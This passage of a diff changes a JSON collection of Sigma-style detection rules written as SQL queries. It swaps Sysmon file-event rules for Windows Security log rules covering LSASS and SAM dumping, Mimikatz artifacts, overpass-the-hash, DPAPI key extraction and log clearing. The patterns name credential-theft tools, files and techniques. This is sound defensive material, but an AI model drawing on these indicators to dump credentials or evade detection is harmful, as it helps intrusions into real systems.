ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2021-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2022-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2023-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-haxx%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Sam.save%' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\windows\\\\temp\\\\sam' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4768' AND TargetUserName LIKE '%$' ESCAPE '\\' AND CertThumbprint LIKE '%' ESCAPE '\\') AND NOT ((IpAddress = '::1') OR (CertThumbprint = '')))" ], - "filename": "file_event_win_hktl_hivenightmare_file_exports.yml" + "filename": "win_security_petitpotam_susp_tgt_request.yml" }, { - "title": "LSASS Memory Dump File Creation", - "id": "5e3d3601-0662-4af0-b1d2-36a05e90c40a", + "title": "Successful Overpass the Hash Attempt", + "id": "192a0330-c20b-4356-90b6-7b7049ae0b87", "status": "test", - "description": "LSASS memory dump creation using operating systems utilities. 
Procdump will use process name in output file if no name is specified", - "author": "Teymur Kheirkhabarov, oscd.community", + "description": "Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.", + "author": "Roberto Rodriguez (source), Dominik Schaudel (rule)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.lateral_movement", + "attack.s0002", + "attack.t1550.002" ], "falsepositives": [ - "Dumping lsass memory for forensic investigation purposes by legitimate incident responder or forensic invetigator", - "Dumps of another process that contains lsass in its process name (substring)" + "Runas command-line tool using /netonly parameter" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%lsass%' ESCAPE '\\' AND TargetFilename LIKE '%dmp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'seclogo' AND AuthenticationPackageName = 'Negotiate')" ], - "filename": "file_event_win_lsass_memory_dump_file_creation.yml" + "filename": "win_security_overpass_the_hash.yml" }, { - "title": "Wmiexec Default Output File", - "id": "8d5aca11-22b3-4f22-b7ba-90e60533e1fb", - "status": "experimental", - "description": "Detects the creation of the default output filename used by the wmiexec tool", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Kerberos Manipulation", + "id": "f7644214-0eb0-4ace-9455-331ec4c09253", + "status": "test", + "description": "This method triggers on rare Kerberos Failure Codes caused by manipulations of Kerberos messages", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1047" + "attack.credential_access", + "attack.t1212" ], "falsepositives": [ - "Unlikely" + "Faulty legacy applications" ], - "level": 
"critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename REGEXP '\\\\Windows\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'C:\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'D:\\\\__1\\d{9}\\.\\d{1,7}$'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('675', '4768', '4769', '4771') AND FailureCode IN ('0x9', '0xA', '0xB', '0xF', '0x10', '0x11', '0x13', '0x14', '0x1A', '0x1F', '0x21', '0x22', '0x23', '0x24', '0x26', '0x27', '0x28', '0x29', '0x2C', '0x2D', '0x2E', '0x2F', '0x31', '0x32', '0x3E', '0x3F', '0x40', '0x41', '0x43', '0x44'))" ], - "filename": "file_event_win_wmiexec_default_filename.yml" + "filename": "win_security_susp_kerberos_manipulation.yml" }, { - "title": "Suspicious Binary Writes Via AnyDesk", - "id": "2d367498-5112-4ae5-a06a-96e7bc33a211", - "status": "experimental", - "description": "Detects AnyDesk writing binary files to disk other than \"gcapi.dll\".\nAccording to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll,\nwhich is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. 
(See reference section for more details)\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Sysmon Channel Reference Deletion", + "id": "18beca67-ab3e-4ee3-ba7a-a46ca8d7d0cc", + "status": "test", + "description": "Potential threat actor tampering with Sysmon manifest and eventually disabling it", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\anydesk.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%\\\\gcapi.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND ObjectValueName = 'Enabled' AND NewValue = '0') OR (EventID = '4663' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND AccessMask = '65536')))" ], - "filename": "file_event_win_anydesk_writing_susp_binaries.yml" + "filename": "win_security_sysmon_channel_reference_deletion.yml" }, { - "title": "UAC Bypass Using .NET Code Profiler on MMC", - "id": "93a19907-d4f9-4deb-9f91-aac4692776a6", + "title": "DPAPI Domain Backup Key Extraction", + "id": "4ac1f50b-3bd0-4968-902d-868b4647937e", "status": "test", - "description": "Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects tools extracting LSA 
secret DPAPI domain backup key from Domain Controllers", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.credential_access", + "attack.t1003.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pe386.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectType = 'SecretObject' AND AccessMask = '0x2' AND ObjectName LIKE '%BCKUPKEY%' ESCAPE '\\')" ], - "filename": "file_event_win_uac_bypass_dotnet_profiler.yml" + "filename": "win_security_dpapi_domain_backupkey_extraction.yml" }, { - "title": "Potential Persistence Via Outlook Form", - "id": "c3edc6a5-d9d4-48d8-930e-aab518390917", + "title": "RDP over Reverse SSH Tunnel WFP", + "id": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", "status": "experimental", - "description": "Detects the creation of a new Outlook form which can contain malicious code", - "author": "Tobias Michalski (Nextron Systems)", + "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", + "author": "Samir Bousseaden", "tags": [ - "attack.persistence", - "attack.t1137.003" + "attack.defense_evasion", + "attack.command_and_control", + "attack.lateral_movement", + "attack.t1090.001", + "attack.t1090.002", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ - "Legitimate use of outlook forms" + "Programs that connect locally to the RDP port" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\outlook.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\FORMS\\\\IPM%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local 
Settings\\\\Application Data\\\\Microsoft\\\\Forms%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND ((SourcePort = '3389' AND (DestAddress LIKE '127.%' ESCAPE '\\' OR DestAddress LIKE '::1' ESCAPE '\\')) OR (DestPort = '3389' AND (SourceAddress LIKE '127.%' ESCAPE '\\' OR SourceAddress LIKE '::1' ESCAPE '\\')))) AND NOT ((FilterOrigin = 'AppContainer Loopback') OR ((Application LIKE '%\\\\thor.exe' ESCAPE '\\' OR Application LIKE '%\\\\thor64.exe' ESCAPE '\\'))))" ], - "filename": "file_event_win_office_outlook_newform.yml" + "filename": "win_security_rdp_reverse_tunnel.yml" }, { - "title": "Potential SAM Database Dump", - "id": "4e87b8e2-2ee9-4b2a-a715-4727d297ece0", - "status": "experimental", - "description": "Detects the creation of files that look like exports of the local SAM (Security Account Manager)", - "author": "Florian Roth (Nextron Systems)", + "title": "Active Directory Replication from Non Machine Account", + "id": "17d619c1-e020-4347-957e-1d1207455c93", + "status": "test", + "description": "Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ "attack.credential_access", - "attack.t1003.002" + "attack.t1003.006" ], "falsepositives": [ - "Rare cases of administrative activity" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\Temp\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.sav' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Intel\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.hive' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Perflogs\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ProgramData\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\sam' 
ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\_ShadowSteal.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Documents\\\\SAM.export' ESCAPE '\\' OR TargetFilename LIKE '%:\\\\sam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.export%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\~reg\\_sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam\\_backup%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.bck%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.backup%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND AccessMask = '0x100' AND (Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\'))" ], - "filename": "file_event_win_sam_dump.yml" + "filename": "win_security_ad_replication_non_machine_account.yml" }, { - "title": "Suspicious Process Writes Ntds.dit", - "id": "11b1ed55-154d-4e82-8ad7-83739298f720", - "status": "experimental", - "description": "Detects suspicious processes that write (copy) a Active Directory database (ntds.dit) file", - "author": "Florian Roth (Nextron Systems)", + "title": "HybridConnectionManager Service Installation", + "id": "0ee4d8a5-4e67-4faf-acfa-62a78457d1f2", + "status": "test", + "description": "Rule to detect the Hybrid Connection Manager service installation.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003" + "attack.persistence", + "attack.t1554" ], "falsepositives": [ - "Unknown" + "Legitimate use of Hybrid Connection Manager via Azure function apps." 
], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'HybridConnectionManager' AND ServiceFileName LIKE '%HybridConnectionManager%' ESCAPE '\\')" ], - "filename": "file_event_win_susp_ntds_dit.yml" + "filename": "win_security_hybridconnectionmgr_svc_installation.yml" }, { - "title": "Wmiprvse Wbemcomn DLL Hijack - File", - "id": "614a7e17-5643-4d89-b6fe-f9df1a79641c", + "title": "PowerShell Scripts Installed as Services - Security", + "id": "2a926e6a-4b81-4011-8a96-e36cc8c04302", "status": "test", - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects powershell script installed as a Service", + "author": "oscd.community, Natalia Shornikova", "tags": [ "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image = 'System' AND TargetFilename LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%powershell%' ESCAPE '\\' OR ServiceFileName LIKE '%pwsh%' ESCAPE '\\'))" ], - "filename": 
"file_event_win_wmiprvse_wbemcomn_dll_hijack.yml" + "filename": "win_security_powershell_script_installed_as_service.yml" }, { - "title": "UAC Bypass Using IEInstal - File", - "id": "bdd8157d-8e85-4397-bb82-f06cc9c71dbb", - "status": "test", - "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Invoke-Obfuscation CLIP+ Launcher - Security", + "id": "4edf51e1-cb83-4e1a-bc39-800e396068e3", + "status": "experimental", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\IEInstal.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%consent.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%clipboard]::%' ESCAPE '\\')" ], - "filename": "file_event_win_uac_bypass_ieinstal.yml" + "filename": "win_security_invoke_obfuscation_clip_services_security.yml" }, { - "title": "Potential Persistence Via Microsoft Office Add-In", - "id": "8e1cb247-6cf6-42fa-b440-3f27d57e9936", - "status": "test", - "description": "Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).", - "author": "NVISO", + "title": "CVE-2023-23397 Exploitation Attempt", + "id": "73c59189-6a6d-4b9f-a748-8f6f9bbed75c", + "status": 
"experimental", + "description": "Detects outlook initiating connection to a WebDAV or SMB share, which could be a sign of CVE-2023-23397 exploitation.", + "author": "Robert Lee @quantum_cookie", "tags": [ - "attack.persistence", - "attack.t1137.006" + "attack.credential_access", + "attack.initial_access", + "cve.2023.23397" ], "falsepositives": [ - "Legitimate add-ins" + "Searchprotocolhost.exe likes to query these registry keys. To avoid false postives, it's better to filter out those events before they reach the SIEM" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.wll' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xll' ESCAPE '\\') OR (TargetFilename LIKE '%Microsoft\\\\Excel\\\\XLSTART\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xlam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Addins\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.xlam' ESCAPE '\\' OR TargetFilename LIKE '%.xla' ESCAPE '\\' OR TargetFilename LIKE '%.ppam' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ProcessName LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%Services\\\\%' ESCAPE '\\' AND (ObjectName LIKE '%WebClient\\\\NetworkProvider' ESCAPE '\\' OR ObjectName LIKE '%LanmanWorkstation\\\\NetworkProvider' ESCAPE '\\') AND AccessList LIKE '%\\%\\%4416%' ESCAPE '\\')" ], - "filename": "file_event_win_office_addin_persistence.yml" + "filename": "win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml" }, { - "title": "Legitimate Application Dropped Archive", - "id": "654fcc6d-840d-4844-9b07-2c3300e54a26", - "status": "experimental", - "description": "Detects 
programs on a Windows system that should not write an archive to disk", - "author": "frack113, Florian Roth", + "title": "Scanner PoC for CVE-2019-0708 RDP RCE Vuln", + "id": "8400629e-79a9-4737-b387-5db940ab2367", + "status": "test", + "description": "Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep", + "author": "Florian Roth (Nextron Systems), Adam Bradbury (idea)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordview.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Image LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR Image LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.7z' ESCAPE '\\' OR TargetFilename LIKE '%.diagcab' ESCAPE '\\' OR TargetFilename LIKE '%.appx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4625' AND TargetUserName = 'AAAAAAA')" ], - "filename": 
"file_event_win_legitimate_app_dropping_archive.yml" + "filename": "win_security_rdp_bluekeep_poc_scanner.yml" }, { - "title": "UEFI Persistence Via Wpbbin - FileCreation", - "id": "e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f", - "status": "experimental", - "description": "Detects creation of a file named \"wpbbin\" in the \"%systemroot%\\system32\\\" directory. Which could be indicative of UEFI based persistence method", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Security Eventlog Cleared", + "id": "d99b79d2-0a6f-4f46-ad8b-260b6e17f982", + "status": "test", + "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.t1542.001" + "attack.t1070.001", + "car.2016-04-002" ], "falsepositives": [ - "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '517' AND Provider_Name = 'Security') OR (EventID = '1102' AND Provider_Name = 'Microsoft-Windows-Eventlog')))" ], - "filename": "file_event_win_wpbbin_persistence.yml" + "filename": "win_security_susp_eventlog_cleared.yml" }, { - "title": "LSASS Process Dump Artefact In CrashDumps Folder", - "id": "6902955a-01b7-432c-b32a-6f5f81d8f625", - "status": "experimental", - "description": "Detects the presence of an LSASS dump file in the \"CrashDumps\" folder. This could be a sign of LSASS credential dumping. 
Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.", - "author": "@pbssubhash", + "title": "RDP Login from Localhost", + "id": "51e33403-2a37-4d66-a574-1fda1782cc31", + "status": "test", + "description": "RDP login with localhost source address may be a tunnelled login", + "author": "Thomas Patzke", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.lateral_movement", + "car.2013-07-002", + "attack.t1021.001" ], "falsepositives": [ - "Rare legitimate dump of the process by the operating system due to a crash of lsass" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\CrashDumps\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%lsass.exe.%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '10' AND IpAddress IN ('::1', '127.0.0.1'))" ], - "filename": "file_event_win_lsass_shtinkering.yml" + "filename": "win_security_rdp_localhost_login.yml" }, { - "title": "WMI Persistence - Script Event Consumer File Write", - "id": "33f41cdd-35ac-4ba8-814b-c6a4244a1ad4", + "title": "User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'", + "id": "6daac7fc-77d1-449a-a71a-e6b4d59a0e54", "status": "test", - "description": "Detects file writes of WMI script event consumer", - "author": "Thomas Patzke", + "description": "The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. 
Possible Rubeus tries to get a handle to LSA.", + "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", "tags": [ - "attack.t1546.003", - "attack.persistence" + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.t1558.003" ], "falsepositives": [ - "Dell Power Manager (C:\\Program Files\\Dell\\PowerManager\\DpmPowerPlanSetup.exe)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\scrcons.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4673' AND Service = 'LsaRegisterLogonProcess()' AND Keywords = '0x8010000000000000')" ], - "filename": "file_event_win_wmi_persistence_script_event_consumer_write.yml" + "filename": "win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml" }, { - "title": "DLL Search Order Hijackig Via Additional Space in Path", - "id": "b6f91281-20aa-446a-b986-38a92813a18f", - "status": "experimental", - "description": "Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)\nbut with a space in order to trick DLL load search order and perform a \"DLL Search Order Hijacking\" attack\n", - "author": "frack113, Nasreddine Bencherchali", + "title": "NetNTLM Downgrade Attack", + "id": "d3abac66-f11c-4ed0-8acb-50cc29c97eed", + "status": "test", + "description": "Detects NetNTLM downgrade attack", + "author": "Florian Roth (Nextron Systems), wagga", "tags": [ - "attack.persistence", - "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1574.002" + "attack.t1562.001", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE 'C:\\\\Windows \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files 
\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files (x86) \\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4657' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%ControlSet%' ESCAPE '\\' AND ObjectName LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND ObjectValueName IN ('LmCompatibilityLevel', 'NtlmMinClientSec', 'RestrictSendingNTLMTraffic'))" ], - "filename": "file_event_win_dll_sideloading_space_path.yml" + "filename": "win_security_net_ntlm_downgrade.yml" }, { - "title": "Mimikatz Kirbi File Creation", - "id": "9e099d99-44c2-42b6-a6d8-54c3545cab29", + "title": "AD Object WriteDAC Access", + "id": "028c7842-4243-41cd-be6f-12f3cf1a26c7", "status": "test", - "description": "Detects the creation of files created by mimikatz such as \".kirbi\", \"mimilsa.log\", etc.", - "author": "Florian Roth (Nextron Systems), David ANDRE", + "description": "Detects WRITE_DAC access to a domain object", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.credential_access", - "attack.t1558" + "attack.defense_evasion", + "attack.t1222.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%.kirbi' ESCAPE '\\' OR TargetFilename LIKE '%mimilsa.log' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectServer = 'DS' AND AccessMask = '0x40000' AND ObjectType IN ('19195a5b-6da0-11d0-afd3-00c04fd930c9', 'domainDNS'))" ], - "filename": "file_event_win_hktl_mimikatz_files.yml" + "filename": "win_security_ad_object_writedac_access.yml" }, { - "title": "Dumpert Process Dumper Default File", - "id": "93d94efc-d7ad-4161-ad7d-1638c4f908d8", + "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - Security", + "id": 
"ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34", "status": "test", - "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.privilege_escalation", + "attack.t1134.001", + "attack.t1134.002" ], "falsepositives": [ - "Very unlikely" + "Highly unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\dumpert.dmp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName 